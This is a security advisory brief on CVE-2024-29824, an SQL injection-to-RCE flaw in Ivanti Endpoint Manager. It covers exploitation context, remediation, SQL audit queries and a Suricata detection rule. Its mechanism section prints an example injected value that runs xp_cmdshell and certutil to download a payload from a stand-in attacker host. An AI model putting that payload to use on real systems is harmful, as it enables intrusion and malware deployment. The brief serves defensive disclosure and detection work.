CVE-2024-29824 Critical Patch Available

CVE-2024-29824: Ivanti EPM — SQL Injection to RCE

Vuln Brief Research Team · · CVSS 9.6

CVE Details

CVE ID CVE-2024-29824
CVSS Score 9.6
Severity Critical
Vendor Ivanti
Product Endpoint Manager (EPM)
Patch Status Available
Published March 21, 2026

Background

Ivanti Endpoint Manager (EPM, formerly LANDESK Management Suite) is an enterprise endpoint management platform used by IT operations teams to deploy software, manage patches, and maintain inventory across large fleets of endpoints. EPM’s Core server has administrative authority over every managed endpoint in an organisation — the ability to push software, run scripts, and remotely control systems. This central management role makes it a high-value target: compromising EPM provides a ready-made mechanism for deploying malware to every managed device.

CVE-2024-29824 is a critical SQL injection vulnerability in Ivanti EPM’s DAS (Database Access Service) component. Disclosed in May 2024, it was added to CISA’s KEV catalogue in September 2024 after confirmed exploitation in the wild. The vulnerability allows attackers with access to the EPM network (not requiring internet-facing exposure) to achieve unauthenticated RCE through SQL injection into SQL Server.

Technical Mechanism

CVE-2024-29824 is an SQL injection in Ivanti EPM’s Core server, specifically in the RecordGoodApp function within PatchBiz.dll — a component of the EPM DAS service that handles patch management operations.

The vulnerable function processes agent-submitted data that includes file hash and path information. This data is incorporated into SQL queries without proper parameterisation:

-- Vulnerable pattern (conceptual)
-- When an agent submits patch inventory data, the Core processes:
INSERT INTO GoodApps (hash, path) VALUES ('<agent_hash>', '<agent_path>')

-- Malicious agent-supplied hash value:
hash = abc123'; EXEC xp_cmdshell 'certutil -urlcache -f http://attacker.com/shell.exe C:\temp\shell.exe'; --

-- Resulting query:
INSERT INTO GoodApps (hash, path) VALUES ('abc123';
EXEC xp_cmdshell 'certutil -urlcache -f http://attacker.com/shell.exe C:\temp\shell.exe'; --', '<path>')

The attack chain:

  1. Reach the EPM DAS service: The DAS service listens on a network port within the organisation’s network. Attackers on the internal network or with access via VPN can reach it.
  2. Submit malicious inventory data: Craft a request simulating an EPM agent submitting patch data with a SQL injection payload in the hash or path field.
  3. Enable xp_cmdshell: If not already enabled, use sp_configure to enable the SQL Server extended stored procedure.
  4. Execute commands: Use xp_cmdshell to run arbitrary Windows commands in the context of the SQL Server service account (typically LOCAL SYSTEM or a high-privilege service account).

Horizon3.ai and other researchers published technical analyses confirming that the vulnerability is in the RecordGoodApp procedure and that the SQL Server instance running EPM typically has sufficient privileges for xp_cmdshell exploitation.

Real-World Exploitation Evidence

CISA added CVE-2024-29824 to its KEV catalogue on September 16, 2024, confirming active exploitation. The exploitation context:

  • Internal network exploitation: While the vulnerability requires internal network access (not directly exploitable from the internet for most deployments), it is highly valuable for post-breach lateral movement — an attacker who has breached any system on the corporate network can pivot to EPM and gain domain-wide endpoint management access.
  • Ransomware staging: EPM’s ability to push software to all managed endpoints makes it a perfect ransomware deployment mechanism; threat actors use EPM compromises to achieve simultaneous mass deployment.
  • Chained with other vulnerabilities: Attackers who gained initial foothold through phishing, VPN exploitation, or other means used CVE-2024-29824 as a privilege escalation/lateral movement step.

Impact Assessment

EPM server compromise is among the highest-impact lateral movement scenarios:

  • Domain-wide endpoint control: EPM has administrative authority to push software and scripts to every managed endpoint; this becomes a ransomware deployment weapon.
  • Endpoint security bypass: EPM can modify endpoint configurations including security software settings, whitelisting rules, and update policies.
  • Mass credential harvesting: Scripts pushed via EPM can harvest credentials from every managed endpoint simultaneously.
  • Software distribution hijacking: EPM’s software distribution features can push trojanised software as if it were a legitimate IT deployment.
  • Hardware inventory: EPM’s asset inventory contains detailed information on every managed device, useful for attacker reconnaissance.

Affected Versions

ProductAffected VersionsFixed Version
Ivanti EPM 20242024 (before hotfix)2024 SU1
Ivanti EPM 20222022 SU5 and earlier2022 SU6

Remediation Steps

  1. Apply Ivanti patches: Update to EPM 2024 SU1 or EPM 2022 SU6 from the Ivanti Customer Success portal.

  2. Restrict EPM DAS network access: Ensure the EPM Core server’s DAS service ports are only accessible from authorised EPM agents and management workstations — not from general internal network segments.

  3. Audit SQL Server configuration:

    -- Check if xp_cmdshell is enabled
SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';

-- Disable xp_cmdshell if not required
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

-- Check for recent command execution
SELECT * FROM sys.dm_exec_query_stats ORDER BY last_execution_time DESC;

  4. Review EPM agent accounts: Audit which agent accounts are registered and whether any rogue agents have been added.

  5. Check for unusual software distributions: Review EPM’s software distribution history for any unexpected deployments that might indicate attacker activity.

  6. Monitor SQL Server for xp_cmdshell usage: Enable SQL Server Audit or Extended Events to log xp_cmdshell calls.

Detection Guidance

Log sources:

  • Windows Event Logs on EPM Core server (Event ID 4688 for process creation)
  • SQL Server error log and audit log
  • Ivanti EPM application logs: C:\ProgramData\LANDesk\ManagementSuite\logs\

SQL Server audit for xp_cmdshell:

-- Enable audit for xp_cmdshell
CREATE SERVER AUDIT SPECIFICATION EPM_xpcmdshell_audit
FOR SERVER AUDIT EPM_audit
ADD (EXECUTE OBJECT ON OBJECT::[sys].[xp_cmdshell] BY [public]);

Windows Event Log patterns:

  • Event 4688: sqlservr.exe spawning cmd.exe or powershell.exe
  • Event 7045: New service installation on the EPM server

Suricata signature:

alert tcp $HOME_NET any -> $HOME_NET 9593 (msg:"Ivanti EPM CVE-2024-29824 DAS SQL Injection Probe"; flow:established,to_server; content:"RecordGoodApp"; nocase; content:"xp_cmdshell"; nocase; distance:0; sid:9002982; rev:1;)

Timeline

DateEvent
May 21, 2024Ivanti publishes advisory; patches released
May 2024Security researchers publish technical analysis and PoC
September 16, 2024CISA adds CVE-2024-29824 to KEV catalogue (confirmed exploitation)
September 2024Multiple threat actors documented exploiting vulnerability
October 2024Ransomware campaigns using EPM as deployment mechanism documented

Tags

ivantiendpoint-managerepmsql-injectionrceendpoint-managementcisa-kev

Related Analysis

CVE-2024-1708 Critical

CVE-2024-1708: ConnectWise ScreenConnect Path Traversal — RMM Tools as Attack Vectors

ConnectWise

CVE-2026-0300 Critical

CVE-2026-0300: Palo Alto PAN-OS Out-of-Bounds Write Leads to Root RCE on Firewalls

Palo Alto Networks

CVE-2026-20182 Critical

CVE-2026-20182: Cisco Catalyst SD-WAN Authentication Bypass — Unauthenticated Admin Access

Cisco